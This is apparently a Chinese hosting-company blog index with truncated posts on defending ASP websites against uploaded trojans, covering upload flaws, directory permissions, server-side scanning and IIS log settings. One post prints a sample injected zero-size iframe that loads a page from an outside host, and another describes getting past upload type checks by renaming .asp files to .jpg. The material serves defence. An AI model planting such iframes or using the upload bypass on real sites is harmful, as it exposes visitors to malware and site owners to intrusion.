预览模式: 普通 | 列表

网站被上传木马(网站被黑)如何处理

  有时会收到一些客户反映网站被黑,或被上传木马,当用户访问网站时就会下载病毒或者木马,杀毒软件弹出病毒的提示。这种情况是以下2种情况导致的。

      第一种情况:客户网站存在文件上传漏洞。导致黑客可以使用这漏洞,上传黑客文件。然后黑客可以对该用户网站所有文件进行任意修改,这种情况比较普遍。针对这种情况,用户需要找技术人员,检查出网站漏洞并彻底修复,并检查看网站是否还有黑客隐藏的恶意文件。

      原因:很多网站都需要使用到文件上传功能,例如很多网站需要发布产品图片等。

查看更多...

分类:Asp | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 21

主机10重保护

Stream开关设置
  ASP中的ADODB.Stream 对象用来操作二进制或文本数据的流。通常用于无组件上传和验证码等功能。关闭该组件可以提高网站安全。
Fso开关设置
  FSO(FileSystemObject)是微软ASP的一个对文件操作的控件,该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。关闭该组件有利于提高网站安全。
Ftp权限设置
  如果你的网站建好后,今后一段时间都不会再用到ftp上传功能,您可以暂时关闭FTP上传。这有助于提高网站的安全,即使ftp密码泄露,黑客也不能操作你空间内的文件。同时系统支持设置拒绝所有IP,只允许某些IP登录。进一步提高安全性。
脚本权限设置
  您可以设置您的网站支持哪些网站脚本,如果您的网站只使用了asp,您可以设置为只开放asp权限。这样黑客即使上传了php的木马到您的空间也不能运行!最少的权限=最大的安全!
写入权限设置
  本系统支持全国领先的目录权限设置,允许关闭网站的写入权限,锁定虚拟主机。对安全有重要意义,例如可以将access数据库放在databases目录,而将wwwroot目录的写入 权限关闭,令asp木马根本无法上传,这样比关闭FSO更安全。
IP 限制
  您可以明确拒绝或授权某些IP地址对您网站的访问。 对某些重要的子目录,如论坛的后台管理目录/admin/您可以设置为所有人拒绝访问,只允许您自己的ip访问.这样即使黑客知道了你论坛的超级管理密码,也无法对你的论坛进行管理和破坏!
文件保护
  您可以设置您要保护的文件,当文件被保护之后,该文件将无法从web访问。您可以使用该功能来保护您的重要文件的安全性,比如ACCESS数据库等。
目录保护
  通常用户网站被黑(如网页被篡改,文件被盗,被删等)都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。   所以在无法确认系统是否存在上传漏洞的情况下,只要保证文件上传目录没有脚本运行权限,那么即便黑客将木马上传到您的空间他也无法运行,这样就无法危及您的网站,使您网站更安全。
自动查杀病毒木马
  功能介绍:如果您的网站存在上传漏洞或注入漏洞,很容易被黑客上传木马,添加病毒代码。查看您的网页源代码,会发现病毒代码一般是: 
<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>等,而黑客通常会在您的网站里面留下后门程序,如海洋顶端asp木马,以便日后再次侵入您的网站。使用该功能,可以轻松将这些病毒木马一网打尽! ds
服务器端自动杀毒
  因传统杀毒软件不能有效地识别网页木马,特别是网页木马经常被加壳或制作为变种!所以我司自主开发了专门针对网页木马的杀毒软件,每天晚上自动扫描所有网站。发现木马的,对该文件自动更名;发现iframe病毒的,对病毒代码自动清除;并自动通过电子邮件通知你,让您轻松掌握您的网站情况
(业界独有)
分类:Asp | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 24
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。

  前不久《http://bbs.blueidea.com/thread-2818052-1-1.html一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:

注意,以下地址含有木马,请不要轻易访问:

查看更多...

分类:Asp | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 25

警惕ASP上传漏洞木马窥视你



最近发现很多网站被挂马,而且UPLOAD文件夹里面多了一个569853.asp
出于好奇对被进入的一个网站进行了研究.

查看更多...

分类:Asp | 固定链接 | 评论: 1 | 引用: -2 | 查看次数: 24
最近发现我辛辛苦苦做好的行业网站老有人喜欢入上面上传些小马.心里很是恼火.想了很久终于想出了一条封杀所有ASP木马的方案出来.

分析图片上传代码:

<!--#include file="upload.inc"-->

查看更多...

分类:Asp | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 23

ASP上传漏洞防范

你的网站是否经常被人上传木马?相信本文会对你有所帮助!
以下是一段很常见的ASP上传代码,尽管限制了上传文件的类型,但只要将要上传的ASP文件后缀改为JPG或其它允许的类型,仍然是可以上传的:

<!--#include file="upload_wj.inc"-->

查看更多...

分类:Asp | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 29
服务器C盘空间不足?无故死机?关闭服务器HTTPERR日志,降低CPU占用!

默认情况下,2003服务器会把所有IIS访问错误的记录写入 C:\WINDOWS\system32\LogFiles\HTTPERR 下的 log 文件中,如果访问量比较大,可能一段时间后 日志文件可能会占满C盘空间,导致服务器死机。同时因为要写入所有的IIS访问记录,如果访问量较大会大大增加服务器CPU占用率

关闭HTTPERR的方法

查看更多...

分类:Asp | 固定链接 | 禁止评论 | 引用: 9118 | 查看次数: 2273